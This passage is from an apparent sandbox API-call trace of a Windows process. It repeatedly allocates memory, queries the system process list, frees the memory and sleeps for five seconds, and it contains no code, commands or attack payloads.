BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.339] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.346] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.346] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.347] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.347] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.347] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.375] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.376] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.377] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.378] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.379] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.380] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.380] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.386] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.387] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.388] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.389] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.390] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.390] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.390] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.396] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.397] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.399] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.399] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.400] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.400] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.400] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.406] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.407] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.408] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.409] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.410] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.410] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.411] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.418] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.419] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.420] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.421] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.422] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.422] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.422] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.426] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.427] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.428] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.429] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.429] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.430] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.430] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.435] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.436] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.437] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.437] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.438] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.438] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.438] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.442] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.443] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.444] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.444] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.445] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.445] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.446] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.450] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.451] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.452] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.452] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.453] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.453] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.453] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.457] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.458] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.460] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.460] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.461] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.461] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.462] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.466] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.469] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.471] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.471] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.472] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.472] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.472] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.476] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.477] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.478] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.478] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.479] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.480] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.480] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.494] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.495] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.497] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.497] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.498] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.498] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.499] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.503] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.503] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.505] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.505] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.506] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.507] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.507] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.511] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.512] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.514] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.514] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.515] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.515] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.515] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.519] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.520] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.522] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.522] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.523] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.523] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.523] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.527] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.528] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.530] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.530] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.532] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.532] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.532] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.536] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.538] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.539] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.540] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.541] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.541] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.541] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.545] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.545] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.547] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.547] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.548] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.548] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.549] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.553] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.554] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.555] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.556] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.556] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.557] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, 